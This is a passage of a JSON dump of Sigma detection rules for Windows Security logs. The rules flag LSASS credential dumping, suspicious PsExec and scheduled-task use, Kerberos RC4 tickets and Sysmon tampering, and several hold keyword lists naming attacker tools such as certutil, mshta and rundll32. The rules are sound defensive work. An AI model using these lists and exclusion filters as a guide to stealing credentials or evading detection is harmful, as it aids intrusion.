    "content": "title: Suspicious Windows ANONYMOUS LOGON Local Account Created\nid: 1bbf25b9-8038-4154-a50b-118f2a32be27\nstatus: test\ndescription: Detects the creation of suspicious accounts with names similar to ANONYMOUS LOGON, such as using additional spaces. Created as a covering detection for the exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.\nreferences:\n    - https://twitter.com/SBousseaden/status/1189469425482829824\nauthor: James Pemberton / @4A616D6573\ndate: 2019-10-31\nmodified: 2022-10-09\ntags:\n    - attack.persistence\n    - attack.t1136.001\n    - attack.t1136.002\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4720\n        SamAccountName|contains|all:\n            - 'ANONYMOUS'\n            - 'LOGON'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_susp_logon_explicit_credentials.yml",
    "content": "title: Suspicious Remote Logon with Explicit Credentials\nid: 941e5c45-cda7-4864-8cea-bbb7458d194a\nstatus: test\ndescription: Detects suspicious processes logging on with explicit credentials\nreferences:\n    - https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view\nauthor: oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Tim Shelton\ndate: 2020-10-05\nmodified: 2022-08-03\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.t1078\n    - attack.lateral-movement\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4648\n        ProcessName|endswith:\n            - '\\cmd.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\winrs.exe'\n            - '\\wmic.exe'\n            - '\\net.exe'\n            - '\\net1.exe'\n            - '\\reg.exe'\n    filter1:\n        TargetServerName: 'localhost'\n    filter2:\n        SubjectUserName|endswith: '$'\n        TargetUserName|endswith: '$'\n    condition: selection and not 1 of filter*\nfalsepositives:\n    - Administrators that use the RunAS command or scheduled tasks\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_susp_lsass_dump.yml",
    "content": "title: Password Dumper Activity on LSASS\nid: aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c\nstatus: test\ndescription: Detects a handle request (Event ID 4656) by the LSASS process with access mask 0x705 and object type SAM_DOMAIN\nreferences:\n    - https://twitter.com/jackcr/status/807385668833968128\nauthor: sigma\ndate: 2017-02-12\nmodified: 2022-10-09\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4656\n        ProcessName|endswith: '\\lsass.exe'\n        AccessMask: '0x705'\n        ObjectType: 'SAM_DOMAIN'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_susp_lsass_dump_generic.yml",
    "content": "title: Potentially Suspicious AccessMask Requested From LSASS\nid: 4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76\nstatus: test\ndescription: Detects a process handle request on the LSASS process with certain access masks\nreferences:\n    - https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html\n    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\nauthor: Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update)\ndate: 2019-11-01\nmodified: 2023-12-19\ntags:\n    - attack.credential-access\n    - car.2019-04-004\n    - attack.t1003.001\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection_1:\n        EventID: 4656 # A handle to an object was requested.\n        ObjectName|endswith: '\\lsass.exe'\n        AccessMask|contains:\n            - '0x40'\n            - '0x1400'\n            # - '0x1000'  # minimum access requirements to query basic info from service\n            - '0x100000'\n            - '0x1410'    # car.2019-04-004\n            - '0x1010'    # car.2019-04-004\n            - '0x1438'    # car.2019-04-004\n            - '0x143a'    # car.2019-04-004\n            - '0x1418'    # car.2019-04-004\n            - '0x1f0fff'\n            - '0x1f1fff'\n            - '0x1f2fff'\n            - '0x1f3fff'\n    selection_2:\n        EventID: 4663 # An attempt was made to access an object\n        ObjectName|endswith: '\\lsass.exe'\n        AccessList|contains:\n            - '4484'\n            - '4416'\n    filter_main_specific:\n        ProcessName|endswith:\n            - '\\csrss.exe'\n            - '\\GamingServices.exe'\n            - '\\lsm.exe'\n            - '\\MicrosoftEdgeUpdate.exe'\n            - '\\minionhost.exe'  # Cyberreason\n            - '\\MRT.exe'         # MS Malware Removal Tool\n            - '\\MsMpEng.exe'     # Defender\n            - '\\perfmon.exe'\n            - '\\procexp.exe'\n            - '\\procexp64.exe'\n            - '\\svchost.exe'\n            - '\\taskmgr.exe'\n            - '\\thor.exe'        # THOR\n            - '\\thor64.exe'      # THOR\n            - '\\vmtoolsd.exe'\n            - '\\VsTskMgr.exe'    # McAfee Enterprise\n            - '\\wininit.exe'\n            - '\\wmiprvse.exe'\n            - 'RtkAudUService64' # https://medium.com/falconforce/the-curious-case-of-realtek-and-lsass-33fc0c8482ff\n        ProcessName|contains:\n            - ':\\Program Files (x86)\\'\n            - ':\\Program Files\\'\n            - ':\\ProgramData\\Microsoft\\Windows Defender\\Platform\\'\n            - ':\\Windows\\SysNative\\'\n            - ':\\Windows\\System32\\'\n            - ':\\Windows\\SysWow64\\'\n            - ':\\Windows\\Temp\\asgard2-agent\\'\n    filter_main_generic:\n        ProcessName|contains: ':\\Program Files'  # too many false positives with legitimate AV and EDR solutions\n    filter_main_exact:\n        ProcessName|endswith:\n            - ':\\Windows\\System32\\taskhostw.exe'\n            - ':\\Windows\\System32\\msiexec.exe'\n            - ':\\Windows\\CCM\\CcmExec.exe'\n    filter_main_sysmon:\n        ProcessName|endswith: ':\\Windows\\Sysmon64.exe'\n        AccessList|contains: '%%4484'\n    filter_main_aurora:\n        ProcessName|contains: ':\\Windows\\Temp\\asgard2-agent-sc\\aurora\\'\n        ProcessName|endswith: '\\aurora-agent-64.exe'\n        AccessList|contains: '%%4484'\n    filter_main_scenarioengine:\n        # Example: C:\\a70de9569c3a5aa22184ef52a890177b\\x64\\SCENARIOENGINE.EXE\n        ProcessName|endswith: '\\x64\\SCENARIOENGINE.EXE'\n        AccessList|contains: '%%4484'\n    filter_main_avira1:\n        ProcessName|contains|all:\n            - ':\\Users\\'\n            - '\\AppData\\Local\\Temp\\is-'\n        ProcessName|endswith: '\\avira_system_speedup.tmp'\n        AccessList|contains: '%%4484'\n    filter_main_avira2:\n        ProcessName|contains: ':\\Windows\\Temp\\'\n        ProcessName|endswith: '\\avira_speedup_setup_update.tmp'\n        AccessList|contains: '%%4484'\n    filter_main_snmp:\n        ProcessName|endswith: ':\\Windows\\System32\\snmp.exe'\n        AccessList|contains: '%%4484'\n    filter_main_googleupdate:\n        ProcessName|contains: ':\\Windows\\SystemTemp\\'\n        ProcessName|endswith: '\\GoogleUpdate.exe'\n        AccessList|contains: '%%4484'\n    filter_optional_procmon:\n        ProcessName|endswith:\n            - '\\procmon64.exe'\n            - '\\procmon.exe'\n        AccessList|contains: '%%4484'\n    condition: 1 of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_susp_net_recon_activity.yml",
    "content": "title: Reconnaissance Activity\nid: 968eef52-9cff-4454-8992-1e74b9cbad6c\nstatus: test\ndescription: Detects activity such as \"net user administrator /domain\" and \"net group domain admins /domain\"\nreferences:\n    - https://findingbad.blogspot.de/2017/01/hunting-what-does-it-look-like.html\nauthor: Florian Roth (Nextron Systems), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community\ndate: 2017-03-07\nmodified: 2022-08-22\ntags:\n    - attack.discovery\n    - attack.t1087.002\n    - attack.t1069.002\n    - attack.s0039\nlogsource:\n    product: windows\n    service: security\n    definition: The volume of Event ID 4661 is high on Domain Controllers and therefore \"Audit SAM\" and \"Audit Kernel Object\" advanced audit policy settings are not configured in the recommendations for server systems\ndetection:\n    selection:\n        EventID: 4661\n        AccessMask: '0x2d'\n        ObjectType:\n            - 'SAM_USER'\n            - 'SAM_GROUP'\n        ObjectName|startswith: 'S-1-5-21-'\n        ObjectName|endswith:\n            - '-500'\n            - '-512'\n    condition: selection\nfalsepositives:\n    - Administrator activity\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_susp_opened_encrypted_zip.yml",
    "content": "title: Password Protected ZIP File Opened\nid: 00ba9da1-b510-4f6b-b258-8d338836180f\nstatus: test\ndescription: Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.\nreferences:\n    - https://twitter.com/sbousseaden/status/1523383197513379841\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-05-09\ntags:\n    - attack.defense-evasion\n    - attack.t1027\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 5379\n        TargetName|contains: 'Microsoft_Windows_Shell_ZipFolder:filename'\n    filter:  # avoid overlaps with 54f0434b-726f-48a1-b2aa-067df14516e4\n        TargetName|contains: '\\Temporary Internet Files\\Content.Outlook'\n    condition: selection and not filter\nfalsepositives:\n    - Legitimate use of encrypted ZIP files\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_filename.yml",
    "content": "title: Password Protected ZIP File Opened (Suspicious Filenames)\nid: 54f0434b-726f-48a1-b2aa-067df14516e4\nstatus: test\ndescription: Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.\nreferences:\n    - https://twitter.com/sbousseaden/status/1523383197513379841\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-05-09\ntags:\n    - attack.command-and-control\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.t1105\n    - attack.t1036\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 5379\n        TargetName|contains: 'Microsoft_Windows_Shell_ZipFolder:filename'\n    selection_filename:\n        TargetName|contains:\n            - 'invoice'\n            - 'new order'\n            - 'rechnung'\n            - 'factura'\n            - 'delivery'\n            - 'purchase'\n            - 'order'\n            - 'payment'\n    condition: selection and selection_filename\nfalsepositives:\n    - Legitimate use of encrypted ZIP files\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_outlook.yml",
    "content": "title: Password Protected ZIP File Opened (Email Attachment)\nid: 571498c8-908e-40b4-910b-d2369159a3da\nstatus: test\ndescription: Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.\nreferences:\n    - https://twitter.com/sbousseaden/status/1523383197513379841\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-05-09\ntags:\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.t1027\n    - attack.t1566.001\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 5379\n        TargetName|contains|all:\n            - 'Microsoft_Windows_Shell_ZipFolder:filename'\n            - '\\Temporary Internet Files\\Content.Outlook'\n    condition: selection\nfalsepositives:\n    - Legitimate use of encrypted ZIP files\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_susp_outbound_kerberos_connection.yml",
    "content": "title: Uncommon Outbound Kerberos Connection - Security\nid: eca91c7c-9214-47b9-b4c5-cb1d7e4f2350\nrelated:\n    - id: e54979bd-c5f9-4d6c-967b-a04b19ac4c74\n      type: similar\nstatus: test\ndescription: |\n    Detects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.\nreferences:\n    - https://github.com/GhostPack/Rubeus\nauthor: Ilyas Ochkov, oscd.community\ndate: 2019-10-24\nmodified: 2024-03-15\ntags:\n    - attack.lateral-movement\n    - attack.credential-access\n    - attack.t1558.003\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 5156\n        DestPort: 88\n    filter_main_lsass:\n        Application|startswith:\n            - '\\device\\harddiskvolume'\n            - 'C:'\n        Application|endswith: '\\Windows\\System32\\lsass.exe'\n    filter_optional_chrome:\n        Application|startswith:\n            - '\\device\\harddiskvolume'\n            - 'C:'\n        Application|endswith:\n            - '\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe'\n            - '\\Program Files\\Google\\Chrome\\Application\\chrome.exe'\n    filter_optional_firefox:\n        Application|startswith:\n            - '\\device\\harddiskvolume'\n            - 'C:'\n        Application|endswith:\n            - '\\Program Files (x86)\\Mozilla Firefox\\firefox.exe'\n            - '\\Program Files\\Mozilla Firefox\\firefox.exe'\n    filter_optional_tomcat:\n        Application|endswith: '\\tomcat\\bin\\tomcat8.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Web browsers and third-party applications might generate similar activity. An initial baseline is required.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_susp_possible_shadow_credentials_added.yml",
    "content": "title: Possible Shadow Credentials Added\nid: f598ea0c-c25a-4f72-a219-50c44411c791\nstatus: test\ndescription: Detects possible addition of shadow credentials to an active directory object.\nreferences:\n    - https://www.elastic.co/guide/en/security/8.4/potential-shadow-credentials-added-to-ad-object.html\n    - https://cyberstoph.org/posts/2022/03/detecting-shadow-credentials/\n    - https://twitter.com/SBousseaden/status/1581300963650187264?\nauthor: Nasreddine Bencherchali (Nextron Systems), Elastic (idea)\ndate: 2022-10-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.t1556\nlogsource:\n    product: windows\n    service: security\n    definition: The \"Audit Directory Service Changes\" logging policy must be configured in order to receive events. Audit events are generated only for objects with configured system access control lists (SACLs) and only when accessed in a manner that matches their SACL settings. This policy covers the following event IDs - 5136, 5137, 5138, 5139, 5141. Note that the default policy does not cover User objects. For that a custom AuditRule needs to be set up (See https://github.com/OTRF/Set-AuditRule)\ndetection:\n    selection:\n        EventID: 5136\n        AttributeLDAPDisplayName: 'msDS-KeyCredentialLink'\n        # If you experience a lot of FP you could uncomment the selection below\n        # There could be other cases for other tooling add them accordingly\n        # AttributeValue|contains: 'B:828'\n        # OperationType: '%%14674' # Value Added\n    # As stated in the FP sections it's better to filter out the expected accounts that perform this operation to tighten the logic\n    # Uncomment the filter below and add the account name (or any other specific field) accordingly\n    # Don't forget to add it to the condition section below\n    # filter:\n        # SubjectUserName: \"%name%\"\n    condition: selection\nfalsepositives:\n    - Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS service account. These accounts can be added as Exceptions. (From elastic FP section)\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_susp_psexec.yml",
    "content": "title: Suspicious PsExec Execution\nid: c462f537-a1e3-41a6-b5fc-b2c2cef9bf82\nstatus: test\ndescription: Detects execution of PsExec or PAExec with a renamed service name. This rule helps to filter out the noise if PsExec is used for legitimate purposes or if an attacker uses a PsExec client other than the Sysinternals one\nreferences:\n    - https://web.archive.org/web/20230329171218/https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html\nauthor: Samir Bousseaden\ndate: 2019-04-03\nmodified: 2022-08-11\ntags:\n    - attack.lateral-movement\n    - attack.t1021.002\nlogsource:\n    product: windows\n    service: security\n    definition: 'The advanced audit policy setting \"Object Access > Audit Detailed File Share\" must be configured for Success/Failure'\ndetection:\n    selection1:\n        EventID: 5145\n        ShareName: '\\\\\\\\\\*\\\\IPC$' # looking for the string \\\\*\\IPC$\n        RelativeTargetName|endswith:\n            - '-stdin'\n            - '-stdout'\n            - '-stderr'\n    filter:\n        RelativeTargetName|startswith: 'PSEXESVC'\n    condition: selection1 and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_susp_raccess_sensitive_fext.yml",
    "content": "title: Suspicious Access to Sensitive File Extensions\nid: 91c945bc-2ad1-4799-a591-4d00198a1215\nrelated:\n    - id: 286b47ed-f6fe-40b3-b3a8-35129acd43bc\n      type: similar\nstatus: test\ndescription: Detects known sensitive file extensions accessed on a network share\nreferences:\n    - Internal Research\nauthor: Samir Bousseaden\ndate: 2019-04-03\nmodified: 2025-10-17\ntags:\n    - attack.collection\n    - attack.t1039\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 5145\n        RelativeTargetName|endswith:\n            - '.bak'\n            - '.dmp'\n            - '.edb'\n            - '.kirbi'\n            - '.msg'\n            - '.nsf'\n            - '.nst'\n            - '.oab'\n            - '.ost'\n            - '.pst'\n            - '.rdp'\n            # - '\\groups.xml'  # Commented out: groups.xml is accessed legitimately by Group Policy processing; high FP rate in enterprise environments\n    condition: selection\nfalsepositives:\n    - Help Desk operator doing backup or re-imaging end user machine or backup software\n    - Users working with these data types or exchanging message files\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_susp_rc4_kerberos.yml",
    "content": "title: Suspicious Kerberos RC4 Ticket Encryption\nid: 496a0e47-0a33-4dca-b009-9e6ca3591f39\nstatus: test\ndescription: Detects service ticket requests using RC4 encryption type\nreferences:\n    - https://adsecurity.org/?p=3458\n    - https://www.trimarcsecurity.com/single-post/TrimarcResearch/Detecting-Kerberoasting-Activity\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-02-06\nmodified: 2022-06-19\ntags:\n    - attack.credential-access\n    - attack.t1558.003\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4769\n        TicketOptions: '0x40810000'\n        TicketEncryptionType: '0x17'\n    reduction:\n        ServiceName|endswith: '$'\n    condition: selection and not reduction\nfalsepositives:\n    - Service accounts used on legacy systems (e.g. NetApp)\n    - Windows Domains with DFL 2003 and legacy systems\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_susp_scheduled_task_creation.yml",
    "content": "title: Suspicious Scheduled Task Creation\nid: 3a734d25-df5c-4b99-8034-af1ddb5883a4\nstatus: test\ndescription: Detects suspicious scheduled task creation events, based on attributes such as paths, command line flags, etc.\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4698\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-05\nmodified: 2022-12-07\ntags:\n    - attack.execution\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1053.005\nlogsource:\n    product: windows\n    service: security\n    definition: 'The Advanced Audit Policy setting Object Access > Audit Other Object Access Events has to be configured to allow this detection. We also recommend extracting the Command field from the embedded XML in the event data.'\ndetection:\n    selection_eid:\n        EventID: 4698\n    selection_paths:\n        TaskContent|contains:\n            - '\\AppData\\Local\\Temp\\'\n            - '\\AppData\\Roaming\\'\n            - '\\Users\\Public\\'\n            - '\\WINDOWS\\Temp\\'\n            - 'C:\\Temp\\'\n            - '\\Desktop\\'\n            - '\\Downloads\\'\n            - '\\Temporary Internet'\n            - 'C:\\ProgramData\\'\n            - 'C:\\Perflogs\\'\n    selection_commands:\n        TaskContent|contains:\n            - 'regsvr32'\n            - 'rundll32'\n            - 'cmd.exe</Command>'\n            - 'cmd</Command>'\n            - '<Arguments>/c '\n            - '<Arguments>/k '\n            - '<Arguments>/r '\n            - 'powershell'\n            - 'pwsh'\n            - 'mshta'\n            - 'wscript'\n            - 'cscript'\n            - 'certutil'\n            - 'bitsadmin'\n            - 'bash.exe'\n            - 'bash '\n            - 'scrcons'\n            - 'wmic '\n            - 'wmic.exe'\n            - 'forfiles'\n            - 'scriptrunner'\n            - 'hh.exe'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_susp_scheduled_task_delete_or_disable.yml",
    "content": "title: Important Scheduled Task Deleted/Disabled\nid: 7595ba94-cf3b-4471-aa03-4f6baa9e5fad\nrelated:\n    - id: dbc1f800-0fe0-4bc0-9c66-292c2abe3f78 # ProcCreation schtasks delete\n      type: similar\n    - id: 9ac94dc8-9042-493c-ba45-3b5e7c86b980 # ProcCreation schtasks disable\n      type: similar\n    - id: 9e3cb244-bdb8-4632-8c90-6079c8f4f16d # TaskScheduler EventLog\n      type: similar\nstatus: test\ndescription: Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4699\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4701\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-05\nmodified: 2023-03-13\ntags:\n    - attack.execution\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1053.005\nlogsource:\n    product: windows\n    service: security\n    definition: 'The Advanced Audit Policy setting Object Access > Audit Other Object Access Events has to be configured to allow this detection. We also recommend extracting the Command field from the embedded XML in the event data.'\ndetection:\n    selection:\n        EventID:\n            - 4699 # Task Deleted Event\n            - 4701 # Task Disabled Event\n        TaskName|contains:\n            # Add more important tasks\n            - '\\Windows\\SystemRestore\\SR'\n            - '\\Windows\\Windows Defender\\'\n            - '\\Windows\\BitLocker'\n            - '\\Windows\\WindowsBackup\\'\n            - '\\Windows\\WindowsUpdate\\'\n            - '\\Windows\\UpdateOrchestrator\\Schedule'\n            - '\\Windows\\ExploitGuard'\n    filter_sys_username:\n        EventID: 4699\n        SubjectUserName|endswith: '$'  # False positives during upgrades of Defender, where its tasks get removed and added\n        TaskName|contains: '\\Windows\\Windows Defender\\'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_susp_scheduled_task_update.yml",
    "content": "title: Suspicious Scheduled Task Update\nid: 614cf376-6651-47c4-9dcc-6b9527f749f4\nrelated:\n    - id: 1c0e41cd-21bb-4433-9acc-4a2cd6367b9b # ProcCreation schtasks change\n      type: similar\nstatus: test\ndescription: Detects scheduled task update events that contain suspicious keywords.\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4698\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-05\ntags:\n    - attack.execution\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1053.005\nlogsource:\n    product: windows\n    service: security\n    definition: 'The Advanced Audit Policy setting Object Access > Audit Other Object Access Events has to be configured to allow this detection. We also recommend extracting the Command field from the embedded XML in the event data.'\ndetection:\n    selection_eid:\n        EventID: 4702\n    selection_paths:\n        TaskContentNew|contains:\n            - '\\AppData\\Local\\Temp\\'\n            - '\\AppData\\Roaming\\'\n            - '\\Users\\Public\\'\n            - '\\WINDOWS\\Temp\\'\n            - 'C:\\Temp\\'\n            - '\\Desktop\\'\n            - '\\Downloads\\'\n            - '\\Temporary Internet'\n            - 'C:\\ProgramData\\'\n            - 'C:\\Perflogs\\'\n    selection_commands:\n        TaskContentNew|contains:\n            - 'regsvr32'\n            - 'rundll32'\n            - 'cmd.exe</Command>'\n            - 'cmd</Command>'\n            - '<Arguments>/c '\n            - '<Arguments>/k '\n            - '<Arguments>/r '\n            - 'powershell'\n            - 'pwsh'\n            - 'mshta'\n            - 'wscript'\n            - 'cscript'\n            - 'certutil'\n            - 'bitsadmin'\n            - 'bash.exe'\n            - 'bash '\n            - 'scrcons'\n            - 'wmic '\n            - 'wmic.exe'\n            - 'forfiles'\n            - 'scriptrunner'\n            - 'hh.exe'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_susp_time_modification.yml",
    "content": "title: Unauthorized System Time Modification\nid: faa031b5-21ed-4e02-8881-2591f98d82ed\nstatus: test\ndescription: Detects scenarios where a potentially unauthorized application or user is modifying the system time.\nreferences:\n    - Private Cuckoo Sandbox (from many years ago, no longer have hash, NDA as well)\n    - Live environment caused by malware\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4616\nauthor: '@neu5ron'\ndate: 2019-02-05\nmodified: 2025-12-03\ntags:\n    - attack.defense-evasion\n    - attack.t1070.006\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: Audit Policy : System > Audit Security State Change, Group Policy : Computer Configuration\\Windows Settings\\Security Settings\\Advanced Audit Policy Configuration\\Audit Policies\\System\\Audit Security State Change'\ndetection:\n    selection:\n        EventID: 4616\n    filter_main_svchost:\n        ProcessName: 'C:\\Windows\\System32\\svchost.exe'\n        SubjectUserSid: 'S-1-5-19'\n    filter_optional_vmtools:\n        ProcessName:\n            - 'C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe'\n            - 'C:\\Program Files (x86)\\VMware\\VMware Tools\\vmtoolsd.exe'\n            - 'C:\\Windows\\System32\\VBoxService.exe'\n            - 'C:\\Windows\\System32\\oobe\\msoobe.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Hyper-V or other virtualization technologies with binaries not listed in the filter portion of the detection\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_svcctl_remote_service.yml",
    "content": "title: Remote Service Activity via SVCCTL Named Pipe\nid: 586a8d6b-6bfe-4ad9-9d78-888cd2fe50c3\nstatus: test\ndescription: Detects remote service activity via remote access to the svcctl named pipe\nreferences:\n    - https://web.archive.org/web/20230329155141/https://blog.menasec.net/2019/03/threat-hunting-26-remote-windows.html\nauthor: Samir Bousseaden\ndate: 2019-04-03\nmodified: 2024-08-01\ntags:\n    - attack.lateral-movement\n    - attack.persistence\n    - attack.t1021.002\nlogsource:\n    product: windows\n    service: security\n    definition: 'The advanced audit policy setting \"Object Access > Audit Detailed File Share\" must be configured for Success/Failure'\ndetection:\n    selection:\n        EventID: 5145\n        ShareName: '\\\\\\\\\\*\\\\IPC$' # looking for the string \\\\*\\IPC$\n        RelativeTargetName: svcctl\n        AccessList|contains: 'WriteData'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_syskey_registry_access.yml",
    "content": "title: SysKey Registry Keys Access\nid: 9a4ff3b8-6187-4fd2-8e8b-e0eae1129495\nstatus: test\ndescription: Detects handle requests and access operations to specific registry keys to calculate the SysKey\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/190625-RegKeyAccessSyskey/notebook.html\nauthor: Roberto Rodriguez @Cyb3rWard0g\ndate: 2019-08-12\nmodified: 2021-11-27\ntags:\n    - attack.discovery\n    - attack.t1012\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID:\n            - 4656\n            - 4663\n        ObjectType: 'key'\n        ObjectName|endswith:\n            - 'lsa\\JD'\n            - 'lsa\\GBG'\n            - 'lsa\\Skew1'\n            - 'lsa\\Data'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_sysmon_channel_reference_deletion.yml",
    "content": "title: Sysmon Channel Reference Deletion\nid: 18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc\nstatus: test\ndescription: Detects potential threat actor tampering with the Sysmon manifest and eventually disabling it\nreferences:\n    - https://twitter.com/Flangvik/status/1283054508084473861\n    - https://twitter.com/SecurityJosh/status/1283027365770276866\n    - https://securityjosh.github.io/2020/04/23/Mute-Sysmon.html\n    - https://gist.github.com/Cyb3rWard0g/cf08c38c61f7e46e8404b38201ca01c8\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-07-14\nmodified: 2025-10-22\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection1:\n        EventID: 4657\n        ObjectName|contains:\n            - 'WINEVT\\Publishers\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'\n            - 'WINEVT\\Channels\\Microsoft-Windows-Sysmon/Operational'\n        ObjectValueName: 'Enabled'\n        NewValue: 0\n    selection2:\n        EventID: 4663\n        ObjectName|contains:\n            - 'WINEVT\\Publishers\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'\n            - 'WINEVT\\Channels\\Microsoft-Windows-Sysmon/Operational'\n        AccessMask: '0x10000'\n    condition: 1 of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_tap_driver_installation.yml",
    "content": "title: Tap Driver Installation - Security\nid: 9c8afa4d-0022-48f0-9456-3712466f9701\nrelated:\n    - id: 8e4cf0e5-aa5d-4dc3-beff-dc26917744a9\n      type: derived\nstatus: test\ndescription: |\n    Detects the installation of a well-known TAP driver service. This could be a sign of potential preparation for data exfiltration using tunnelling techniques.\nreferences:\n    - https://community.openvpn.net/openvpn/wiki/ManagingWindowsTAPDrivers\nauthor: Daniil Yugoslavskiy, Ian Davis, oscd.community\ndate: 2019-10-24\nmodified: 2022-11-29\ntags:\n    - attack.exfiltration\n    - attack.t1048\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: The System Security Extension audit subcategory needs to be enabled to log the EID 4697'\ndetection:\n    selection:\n        EventID: 4697\n        ServiceFileName|contains: 'tap0901'\n    condition: selection\nfalsepositives:\n    - Legitimate OpenVPN TAP installation\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_teams_suspicious_objectaccess.yml",
